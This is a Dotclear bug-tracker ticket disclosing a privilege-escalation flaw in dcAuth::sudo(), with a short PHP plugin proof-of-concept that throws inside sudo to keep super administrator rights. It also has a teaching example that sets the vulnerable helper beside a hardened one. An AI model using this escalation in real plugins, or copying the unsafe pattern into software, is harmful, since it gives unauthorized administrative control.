Dotclear

Ticket #260 (closed defect: fixed)

Opened 17 years ago

Last modified 17 years ago

dcAuth::sudo() can be used by a plugin to permanently become super administrator

Reported by: Fruneau
Owned by: olivier
Priority: high
Milestone: 2.0
Component: module:auth
Version: 2.0 RC1
Severity: normal
Keywords:
Cc:

Description

A plugin only needs to contain the following code in _admin.php:

gainSU(); 
 
function gainSU() { 
  try {
    global $core; 
    $core->auth->sudo('throwExpt'); 
  } catch (Exception $e) { 
  } 
} 
 
function throwExpt() { 
  throw new Exception('machin'); 
} 

Since sudo does not catch exceptions in order to restore the original permissions, this code makes it possible to obtain super administrator rights.

Change History

comment:1 Changed 17 years ago by olivier

  • Priority changed from normal to high
  • Status changed from new to assigned

comment:2 Changed 17 years ago by olivier

  • Status changed from assigned to closed
  • Resolution set to fixed

(In [1871]) Remove super admin rights on dcAuth::sudo exceptions. Closes #260.
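
The failure mode reported in this ticket and the shape of its fix, as an added example that is not Dotclear's code or the content of changeset [1871]: a temporary-elevation helper that restores the flag only on normal return, next to one that restores it on every exit path. DemoAuth, sudoUnsafe and sudoSafe are hypothetical names; try/finally assumes PHP 5.5 or later (on older versions, catch, restore and rethrow has the same effect).

```php
<?php
// Hypothetical stand-in for an auth class; this is not Dotclear's dcAuth source.
class DemoAuth
{
    private $superAdmin = false;

    public function isSuperAdmin()
    {
        return $this->superAdmin;
    }

    // Pattern described in the ticket: the flag is restored only on normal return.
    public function sudoUnsafe($callback)
    {
        $previous = $this->superAdmin;
        $this->superAdmin = true;
        $result = call_user_func($callback); // an exception here skips the restore
        $this->superAdmin = $previous;
        return $result;
    }

    // Hardened: finally runs on return and on exception, so elevation cannot leak.
    public function sudoSafe($callback)
    {
        $previous = $this->superAdmin;
        $this->superAdmin = true;
        try {
            return call_user_func($callback);
        } finally {
            $this->superAdmin = $previous;
        }
    }
}

function throwExpt()
{
    throw new Exception('machin');
}

// Run the ticket's callback through both helpers and report the resulting state.
foreach (array('sudoUnsafe', 'sudoSafe') as $method) {
    $auth = new DemoAuth();
    try {
        $auth->$method('throwExpt');
    } catch (Exception $e) {
        // Swallowed, as in the plugin code from the ticket.
    }
    printf("%s: super admin after exception = %s\n", $method, var_export($auth->isSuperAdmin(), true));
}
```

A regression test for this class of bug asserts the privilege flag after a throwing callback, not only after a successful one.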
